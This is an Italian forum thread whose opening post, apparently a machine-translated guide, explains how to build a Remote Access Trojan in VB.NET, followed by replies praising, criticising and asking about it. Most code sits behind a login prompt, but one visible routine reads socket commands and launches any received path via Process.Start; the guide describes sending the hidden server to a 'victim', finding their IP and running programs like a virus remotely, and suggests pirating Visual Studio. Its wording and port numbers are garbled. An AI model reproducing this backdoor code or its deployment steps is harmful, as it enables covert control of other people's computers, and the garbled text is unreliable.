• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

BeRlUsConIh

Utente Medio
Autore del topic
21 Ottobre 2009
193
0
Miglior risposta
0
Cos'è un RAT?
Prima di tutto un RAT è un programma informatico che permette di accedere da remoto al computer che esegue un file server, il topo si compone di 2 programmi di un client e un server. Si esegue il client che si collega a una porta su un IP remoto che esegue il server.

RAT è l'acronimo di (Remote Access Trojan / Tool)

Il server è impostato per l'ascolto su una porta specifica, come ad esempio i numeri 16.995 e gli altri 5 numeri cifre sono migliori modo che la porta non è facilmente riconoscibile per alcune applicazioni informatiche. E 'anche meglio di stare lontano da 12.345 e 54.321, ecc ...


Server


1. Download Visual Basic. NET Express o acquistare / hack Visual Studio Pro.

Ora create una nuova applicazione Windows e il nome "server". Fare doppio clic sul form per modificare il codice.
Nella parte superiore della finestra di codice messo:
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!


Tutto questo non fa altro che consentire un facile accesso a determinati comandi, ad esempio system.io consente di accedere a file comandi.

File.Open (percorso)
Rispetto a:
System.IO.File.Open (Path)

Così ora abbiamo bisogno di creare un socket di ascolto che si apre una porta sul computer host con questo.
Mettere questo in Public Class Form1 codice prima di Form1 _load
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!


Ora abbiamo bisogno di una funzione che ci permette di abilitare quotazione in porta quando viene chiamato, il luogo sotto il codice appena scritto:

Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

Quello che fa è creata una funzione da chiamare che cercano di permettere all'ascoltatore di iniziare ad ascoltare e quando il client tenta di connettersi lo accetta e se non lo ripete di nuovo solo.

Ora la parte complessa. Ora abbiamo bisogno di creare un flusso di rete che ci permette di inviare e ricevere dati dal client e collocarlo in una subroutine:

Codice:
Perfavore, Entra oppure Registrati per vedere i codici!


Questo script è in realtà abbastanza semplice, tutto ciò che fa è dire se l'ascoltatore è collegato ad una presa di corrente che reindirizza la connessione ad una presa nel server
E se il socket server è connesso tenta di ricevere il flusso di prese di dati.
Viene quindi definito "bit" come un byte leggibile dal flusso di dati del server e ottiene la sua dimensione totale, racconta poi la presa di leggere i dati in arrivo, una volta ricevuto tutto crea una stringa utilizzata per ricevere i dati stringa inviata dal client .
Esso definisce quindi una matrice di stringhe che divide i dati stringa ricevuta e l'id inviati al server sa che cosa di comando per eseguire determinate dal if.

Questa dichiarazione successiva se dice che se la prima stringa nella matrice "id" è uguale a 0 quindi una stringa è definita come la seconda stringa nella matrice "id" e poi un processo viene avviato dal percorso rappresentato da id (1) il seconda corda in tale matrice.

Così ora tutto quello che dobbiamo fare è indicare al programma per eseguire queste funzioni nel comando Form1_Load che è già presente, in quella sotto forma inserire questo codice:
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

Ciò consente al server per iniziare ad ascoltare e, una volta ha trovato un collegamento viene eseguito il controllo () per eseguire le azioni che permette la presa di leggere i dati poi nasconde il modulo per maggiore sicurezza.
ora il server è finito e ora dobbiamo creare il client che rappresenta un po 'più complicato che ci crediate o no :/


CLIENT



Anche in questo caso creare un nuovo progetto Applicazione Windows Form in Visual Basic e sul posto form:

* 3 caselle di testo
* 2 pulsanti
* 3 etichette


Dare Button1 il testo "Connect" (senza virgolette) e dare Button2 il testo "Send" (senza virgolette).

Ora, prima che accada qualcosa di speciale che abbiamo bisogno del nostro codice di base, fare clic su Modulo doppio 1 per modificare il codice, ora come nel server di sopra di tutto nel codice, inserire il seguente codice:

Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

Ora, nella classe Form1 Public mettere:
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!


Come prima di questo definisce un client TCP per la connessione al server.
Si crea una variabile non di testo per l'indirizzo IP per il socket a cui connettersi, per qualche ragione che Microsoft è solo gay e non consente di utilizzare una stringa con il socket.connect () comando fare tutto questo non fa altro che trasformare un stringa in un indirizzo IP, poi definisce un porto variabile chiamata con il valore 6.961 che può essere cambiata.

Ora il Fun Stuff (sarcasmo)

Qui di seguito tutte le vostre definizioni di variabili inserire il codice
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!


Questo crea un sub di nome 'connect ()' quando viene chiamato imposta il valore di "IP" per quello che avete scritto in TextBox1 e quindi porta sia impostata su ciò che avete in TextBox2.

Ora, con questi 2 valori calzino la presa nudo tenta di connettersi al IP e la porta che, se definita, e se la connessione non un messaggio di errore viene mostrato dicendo "Impossibile connettersi al IP designati in questo momento" Sentitevi liberi di cambiare la situazione a tutto ciò che può piacere. Ora abbiamo bisogno di un sub da richiamare quando si vuole inviare i dati al socket connesso.

Codice:
Perfavore, Entra oppure Registrati per vedere i codici!


Così ora quando si chiama dat () hai bisogno di una stringa nella () per essere inviato
ma anche preoccuparsi che in seguito, lo definisce nstream come "calzino il" flusso di dati poi definisce po 'come un byte che codifica il testo in byte che possono essere inviati sul server, quindi il flusso di dati invia le stringnow tornare alla progettazione di modulo 1 dove si è inserito caselle di testo e roba quindi fare doppio clic su button1 e tra le parentesi del Button1_Click inserire questo codice

connect ()

Ciò richiede la funzione connect () che permette la presa per cercare di connettersi al porto designato / IP

Ora fare la stessa cosa per il pulsante 2, e per la messa Button2_Click

dat ("0 *" TextBox3.Text +)

Ciò richiede la dat () e attribuisce la stringa "0 *", che è l'ID della stringa inviata al server, più il testo nella casella di testo 3, che dovrebbe essere un percorso ad una domanda del tipo "c: \ windows virus \ . exe "o qualcosa del genere o può anche essere una pagina web che si desidera aprire come"
Perfavore, Entra oppure Registrati per vedere i Link!
"senza le virgolette ovviamente.


La * è necessario per separare la stringa di una volta decodificato nel server, quindi se si desidera inviare più che la id e 1 stringa è necessario separarle con *
Come questo:

dat ("0 *" + TextBox3.Text "* +" TextBox4.Text +)

Ciò non fare nulla in quanto non esiste textbox 4 perché questo è solo un esempio, e poiché non vi è textbox 4 un errore sarebbe stato generato, ma è così che si dovrebbe fare.

Ora che è in fondo, questo è fondamentalmente per il cliente. questo script è molto versatile come dat () può essere chiamato su qualsiasi premere il tasto / pressione di un tasto, ecc .. Quindi, se volete più funzionalità consente di dire uno creare un messaggio sul computer con il server si utilizza questo in pressione di un pulsante separato che punta ad un'altra casella di testo come questo

dat ("1 *" TextBox4.Text +)

Quale è sufficiente inviare il testo con un nuovo ID al server, ma è necessario modificare il server a riconoscere che id e

Quindi, per fare che il codice

Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

Dovrebbe essere ora:

Private Sub check()
If sock.Connected = True Then
sock.SendTimeout = 5000
Try
Dim nstream As NetworkStream = sock.GetStream
Dim bit(sock.ReceiveBufferSize) As Byte
nstream.Read(bit, 0, CInt(sock.ReceiveBufferSize))
Dim str As String = System.Text.Encoding.ASCII.GetString(bit)
Dim id() As String = Split(str, "*", -1, CompareMethod.Text)


If id(0) = 0 Then
Dim stri As String = id(1)
Process.Start(stri)
End If

If id(0) = 1 Then
Dim stri As String = id(1)
MsgBox(id(1))
End If


Catch ex As Exception
check()
End Try
End If
End Sub


Quindi, se id (0) è 1 che è il comando id si crea una finestra di messaggio con il testo inviato dopo l'id quindi sarebbe ciò che hai fatto 3 textbox dire nel tuo client

Così ora si deve salvare e sviluppare sia il server e il client perché la vostra pronto a partire, tutto questo è la mia mano il codice scritto e pensato da me quindi non ci dovrebbe essere un altro metodo come questo.

Ora di utilizzare questa applicazione, il server invia a qualcuno e, una volta che l'hanno aperto, si dovrebbe iniziare in ascolto sulla porta definita nel server, che 69.691 is but can essere cambiato, per cui una volta che avete qualcuno che esegue il server si need ci IP , cercare sul web per i tutorial su come trovare un IP tramite email, AIM, MSN, o anche Bacheche

Così ora una volta che avete della vittima, uhh, voglio dire IP dell'host aprire il client e nella casella di testo 1 Inserite l'indirizzo IP e in casella di testo 2 Inserite la porta, ora fare clic su Connetti, un errore si dovrebbe trovare, se non è possibile connettersi, ora, una volta collegato mettere un URL o un percorso in casella di testo 3 e colpire inviare, questo dovrebbe aprire una pagina web sul computer host.




SERVER


Codice:
Perfavore, Entra oppure Registrati per vedere i codici!



Client



Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

Guida by mikesh07

R-I-L-I-E-V-O!
 
Ultima modifica:
Bravo,ottima guida. Cerca di aggiustare un po' la struttura del post :
-Evidenzia le parole chiave;
-inserisci i codici negli spoiler
-non limitarti al copia e incolla.
 
Cerca di Formattare di più il testo della guida , poi non si chiede il rilievo

RInomino ;)
 
Buona come guida, ma cerca di farla capire un pò meglio. Avresti potuto mettere i codici dentro TAG, così si capivano meglio.

Ps : Il rilievo si deve meritare.
 
Grazie a tutti...comunque con questa guida volevo solo introdurre ai nuovi utenti la creazione di un client e un server per questo pensavo di meritare il rilievo...comunque cercherò di migliorarla
Fateci un salto piu tardi ;)
--------------- AGGIUNTA AL POST ---------------
Bhè...adesso credo di meritare il rilievo ;)
 
Ultima modifica:
Sintetizzare come... cancellare codici?
:emoji_relieved: :emoji_relieved: :emoji_relieved: non mi sembra che tu abbia detto una cosa tanto sensata ;)
 
Riferimento: Creare un client e un server

Si potrebbe fare una videoguida??????
Non riesco a fare il server! :emoji_relieved: :emoji_relieved:
 
Riferimento: Creare un client e un server

vorrei avere una video guida anch ' io se possibile per comprendere bene dato che stranamente non sto capendo nulla!
 
Riferimento: Creare un client e un server

Ma dai è palese l'ha tradotta con google raga come fate a non accorgervi tipo sta frase:Ora di utilizzare questa applicazione, il server invia a qualcuno e, una volta che l'hanno aperto, si dovrebbe iniziare in ascolto sulla porta definita nel server, che 69.691 is but can essere cambiato, per cui una volta che avete qualcuno che esegue il server si need ci IP , cercare sul web per i tutorial su come trovare un IP tramite email, AIM, MSN, o anche Bacheche

E' poco comprensibile cio che vuole spiegare si capisce ma diciamo non è una cosa discorsvia insomma o il testo è stato tradotto da un cinese o Google diventa vecchio... Poi sta parte che mi rappresenta?: che 69.691 is but can essere cambiato is but can? WTF? are YFK me?

Non merita rilievo questo dimostra quanto leggete le guide -.-"
 
Riferimento: Creare un client e un server

Ma dai è palese l'ha tradotta con google raga come fate a non accorgervi tipo sta frase:Ora di utilizzare questa applicazione, il server invia a qualcuno e, una volta che l'hanno aperto, si dovrebbe iniziare in ascolto sulla porta definita nel server, che 69.691 is but can essere cambiato, per cui una volta che avete qualcuno che esegue il server si need ci IP , cercare sul web per i tutorial su come trovare un IP tramite email, AIM, MSN, o anche Bacheche

E' poco comprensibile cio che vuole spiegare si capisce ma diciamo non è una cosa discorsvia insomma o il testo è stato tradotto da un cinese o Google diventa vecchio... Poi sta parte che mi rappresenta?: che 69.691 is but can essere cambiato is but can? WTF? are YFK me?

Non merita rilievo questo dimostra quanto leggete le guide -.-"

Questa guida oramai è vecchiotta , hai fatto bene a renderlo presente , ma oramai credo che sia inutile precisare il "copia e incolla" , comunque .....

TheHackerX ha fatto necroposting , ma oramai è bannato xD

Non posso neanche segnalare :tristezza:
 
Riferimento: Creare un client e un server

Ciao... Complimenti per la guida.... ma se voglio creare un tasto per disconnettere???
Il codice qual' è?? Va bene sock.close??

Poi, cosa devo mettere per inviare i comandi al computer remoto?
 
Riferimento: Creare un client e un server

Ciao... Complimenti per la guida.... ma se voglio creare un tasto per disconnettere???
Il codice qual' è?? Va bene sock.close??

Se hai usato questa guida allora basta fare così per disconnettersi.

Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

Ps. Non l'ho testato.
PPs. Se hai ancora bisogno Taggami scrivendo @rapa97. ;)
 
Riferimento: Creare un client e un server

Se hai usato questa guida allora basta fare così per disconnettersi.

Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

Ps. Non l'ho testato.
PPs. Se hai ancora bisogno Taggami scrivendo @rapa97. ;)
@rapa97

Mi sottolinea in blu, e mi dice: Risoluzione dell' overload non riuscita perché nessun 'Connect' accessibile accetta questo numero di argomenti
Soluzioni?